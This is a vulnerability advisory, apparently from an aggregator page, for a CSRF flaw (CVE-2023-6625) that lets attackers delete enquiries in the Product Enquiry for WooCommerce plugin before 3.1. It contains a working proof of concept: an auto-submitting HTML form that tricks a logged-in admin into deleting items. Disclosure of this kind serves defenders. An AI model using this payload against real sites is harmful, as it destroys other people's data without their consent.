Lucene search
Bob MatyasWPEX-ID:D483F7CE-CB3F-4FCB-B060-005CEC0EA10FHistoryDec 28, 2023 - 12:00 a.m.
Product Enquiry for WooCommerce < 3.1 - Arbitrary Enquiry Deletion via CSRF
2023-12-2800:00:00
Bob Matyas
38
product enquiry
woocommerce
csrf
exploit
security
Description The plugin does not have a CSRF check in place when deleting inquiries, which could allow attackers to make a logged in admin delete them via a CSRF attack
1. Make an enquiry from the frontend form
2. Go to "Woo Quote Popup > Enquiry List"
3. Get the ID of an item
4. Add the ID to the following HTML:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=GMWQP&view=list" method="POST">
<input type="text" name="action" value="delete">
<input type="text" name="action2" value="delete">
<input type="text" name="page" value="GMWQP">
<input type="text" name="_wp_http_referer" value="%2Fwp-admin%2Fadmin.php%3Fpage%3DGMWQP%26view%3Dlist">
<input type="text" name="id[]" value="__ADD_ID_HERE__">
<input type="submit" value="submit">
</form>
</body>
```
5. See that the item has been deleted.Related
nvd
nvd
CVE-2023-6625
2024-01-22 20:15:47
prion
prion
Cross site request forgery (csrf)
2024-01-22 20:15:00
cvelist
cvelist
wpvulndb
wpvulndb
Product Enquiry for WooCommerce < 3.1 - Arbitrary Enquiry Deletion via CSRF
2023-12-28 00:00:00
Product Enquiry for WooCommerce < 3.1 - Cross-Site Request Forgery
2023-12-09 00:00:00
cve
cve
CVE-2023-6625
2024-01-22 20:15:47
6.7 Medium
AI Score
Confidence
Low
0.0005 Low
EPSS
Percentile
17.1%
Related for WPEX-ID:D483F7CE-CB3F-4FCB-B060-005CEC0EA10F